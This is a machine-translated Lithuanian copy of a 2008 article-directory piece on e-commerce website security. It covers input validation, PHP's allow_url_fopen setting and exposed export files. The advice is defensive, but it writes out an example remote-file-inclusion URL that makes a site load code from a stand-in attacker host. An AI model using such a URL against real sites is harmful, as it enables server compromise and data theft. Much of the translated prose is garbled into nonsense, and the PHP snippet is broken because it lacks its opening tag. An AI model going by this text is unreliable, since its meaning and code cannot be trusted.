The following content has been automatically translated by close 
E-Commerce Saugumo - atitaisymą Saugumo Skylės | commerce straipsnis
Straipsnio Švietimas logotipas

E-Commerce Saugumo - atitaisymą Saugumo skylė

Ekspertų Autorius: Paul Roberts | straipsnio santrauka
Word count: 520 words | Peržiūrėta: 137 View (s)
Saugumas E-komercijos svetainės turi būti svarbiausias dalykas kuriant elektroninės komercijos svetainėje ar programinės įrangos. Kūrėjas turi žinoti apie visus saugumo aspektus kuriant svetainę. Su e-komercija tampa vis labiau įprastas šių dienų, saugumo atakų skaičius neabejotinai auga. Paranoja yra sveikas dalykas, e-commerce svetainės kūrėjai, mes turime išlaikyti iki vartų saugumo klausimus ir išsaugoti mūsų ausys ir akys atsiveria. Nors šių spragų yra rimtas, taip spragų, jei dabar yra lengvai nustatoma.

Toliau išvardyti kai kurie saugumo sumetimais turi būti įtrauktos kuriant svetainę. Šis straipsnis netaikomas E-Shopping vagystė, skaitykite mano atskiras straipsnis apie tai.

Vartotojo indėlis - kiekvieną įėjimo, ar tai būtų įvesti kiekį, ieško produktų, įvežamų vardas ir tt, turi būti patvirtintos dėl įtartinų ženklų. Jei tai nebus padaryta, tai galima įvesti "?>", uždarymo pabaigoje Tags PHP ir vykdyti PHP kodą.

Jis yra daug saugesnis leisti skaičių ir simbolių Az (sostinėse imtinai) ir 0-9 ir daugiau nieko, o ne padaryti visų savybių, kad ten neturėtų būti, sąrašą. Patvirtinimo scenarijų reikia pereiti per kiekvieno požymio po vieną. Tai turi būti pasiekta naudojant serverio pusės įteisinimo, o ne Javascript. Naudojant serverio pirkimo patvirtinimas svarbu išlaikyti nepageidaujamus simbolius

Egzistuoja dar vieną svarbų vykdydamos PHP kodas. Kai naudojant PHP yra nustatyti vadinamas allow_url_fopen, kuri leidžia atidaryti failus iš PHP skripto. Šis parametras turėtų būti išjungtas, išskyrus neabejotinai būtinus atvejus.

Įsivaizduokite, turite PHP tiek fiksuoto, viršus ir apačia, ir prieiti prie savo interneto puslapius, tai tipo http://www.mysite.com/index.php?page=page2. Viskas, ko reikia yra piktybinis vartotojas gali paleisti scenarijų pakeisti šiuos parametrus pagal rašyti "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" su PHP kodas failo "hacker.txt". Galima nieko atsitikti, PHP failus skaityti, išbraukti, gyvybiškai svarbios informacijos vagystės.

Jei nesate tikri, kad šis parametras yra įjungti arba išjungti, prašom nukopijuokite šį PHP kodą į tekstinį failą ir įkelkite jį į savo interneto serverį:

phpinfo ();
?>

Kai atidarote savo scenarijų į savo serverį, turite susidurti kuriame allow_url_fopen pagal konfigūraciją.

Kompiuterio vartotojo, normaliomis sąlygomis negali rasti šio parametro vertės.

Būkite atsargūs, eksportuojamų duomenų, pavyzdžiui, užsakymų, produktų CSV ir MySQL failus. Jei šie duomenys yra eksportuojami iš scenarijaus ir yra saugomi interneto serveryje, pagal bendro failo vardas ty. http://www.mysite.com/admin/output_tables.csv. Tai tik tikrai problema, kai eksportuojami duomenys, gyvena iš katalogo failas, kuris yra viešai prieinamas. Yra du būdai išvengti šios saugumo spragos - pirmiausia turi išėjimo byla už apsaugota slaptažodžiu katalogas, antra, yra duomenų, esančių viduje HTML textarea formos elementą scenarijus. Storeowner galima tada nukopijuokite šį textfile informaciją ir sukurti naują failą į savo kompiuterį ir įdėkite informacijos rasite čia.

Užtenka hacker rasti šio Filename tikrinant iš e-komercijos programinės įrangos demo svetainę ir ieškoti to paties pavadinimo dėl nekilnojamojo svetainę.
Paul Roberts

Apie Autorius / Author Bio

Paul Roberts
Paleisti programinės įrangos kūrimo bendrovė, kuri specializuojasi E-Commerce, Search Engine Optimization, ir Print Įvertinimas įranga vadinama ROBO dizaino sprendimai. Aš taip pat plėtoti Naujoji Zelandija E-komercijos sprendimai ir programinė įranga pagal pavadinimą ROBO Dizainas.

Article Source: http://www.lt.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 137 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Learn About Secure Computing
Kaip apsaugoti kompiuterį Secure
Kaip patikrinti saugos parametrus "Windows Vista"

Daugiau "Elektroninė prekyba" Susiję straipsniai

Žemiau yra daugiau straipsnių, susijusių su pirmiau minėtame straipsnyje iš "Elektroninė prekyba" kategoriją.

Žmonės domisi minėtą straipsnį "E-komercija Saugumo - atitaisymą saugumo skylė" taip pat domisi Related articles išvardyti toliau:

Veikia e-commerce verslui yra ne tik palaikyti savo svetainės sukūrimo ir eksploatavimo. Klientų pasitiki savo gebėjimą tarnauti jiems telefonu, faksu, elektroniniu paštu ar kitomis priemonėmis, ir ji reikalauja, kad visos jūsų sistemos bus darbo, kad būtų galima įvykdyti užsakovo pageidavimus.
Tiesiog porą dienų atgal aš atsižvelgdamas kalbėtis su mano draugu. Jis švenčia savo Baby's 1st birthday, ir turėjo paleisti tarp jo gimtoji Kerala ir Chennai, savo darbo vietoje. Jis ir jo geriau pusmetį keliavo tarp šių vietų ne mažiau kaip 4 kartus, paskutinį mėnesį.
Jei jau daro e-commerce bet kiek laiko, turėtumėte žinoti, kad yra daugiau negu iš tikrųjų scamers teikėjams didmeninės dropship abonentus teikimo paslaugomis. Be elektroninio pasaulio verslo, Salehoo ir Global Brands yra geros reputacijos ir paslaugų teikėjams, kurie įgijo populiarumą pastaruosius keletą metų.
Jei kada nors buvo online mažmenininkas, jūs tikriausiai jau girdėjote apie Salehoo ar net jį naudojo savo pranašumą. Jei jūs tik pradedate savo verslą, Jums gali būti supainiotas su mišrių Salehoo Apžvalgos out there. Dabar Pažiūrėkime, kas Salehoo tikrai visiems ir apie jų siūlomas paslaugas, kurios daugelis linkę žiūrėti pro pirštus.
Kiek žmonių Ar žinote, kad nusipirkote nors internete? Jeigu Jūsų, kaip man labai mažai, todėl e-commerce yra pasaulyje naujomis interneto shopping mall. Bet kuris eina šias internetinės mažmeninės prekybos parduotuvėse? Žmonių kaip jūs ir aš, todėl šis verslas klesti ir toliau bus bumas dabar ir ateityje.
Jei esate didelis gerbėjas naujausius elektroninius gaminius, jums gali būti linkusios iki eksploatavimo savo elektronikos verslo internete idėja. Tai nereiškia, kad sunku pradėti, kai vartojate visapusiškai pasinaudoti teise lašas laivybos elektronikos ir paslaugos yra daug jums rinktis.
Ar kada nors eiti į savo vietos parduotuvę ir patogumo Įdomu, kas būtų, pavyzdžiui, jei jums tai priklauso? Norite būti geras šeimininkas, bus kaip jūs, žmonės? Na, šis straipsnis parodys, kad turinti savo interneto parduotuvėje, ar yra paprastai žinoma kaip naudos E-komercijos, kuri skiriasi nuo realios vietos patogios parduotuvės.
Straipsnis Rodyklės Pradžia Visos kategorijos Interneto ir e-verslas Ecommerce

Can't find what you're looking for? Išbandykite Google Search!
Copyright © 2005 -- by Larry Lim, Singapūras - Article Search Engine Directory ne ArticleSphere.com ™
All rights reserved worldwide. Visi prekiniai ženklai ir Servicemarks yra atitinkamų savininkų nuosavybė.

Afrikanų Albanų Arabų Baltarusių Bulgarų Katalonų Kinų (supaprastinta) Kinų (Tradicinė) Kroatų Čekų Danų Vokiečių Anglų Estų Tagalų Suomių Prancūzų Galisų Graikų Hebrajų Hindi Vengrų Islandų Indoneziečių Airių Italiano Japonų Korėjiečių Latvių Lietuviškai Makedonų Malajiečių Maltiečių Olandų Norvegų Persų Lenkų Portugalų Rumunų Rusų Serbų Slovakų Slovėnų Ispanų Svahili Švedų Tajų Turkų Ukrainiečių Vietnamiečių Valų Jidiš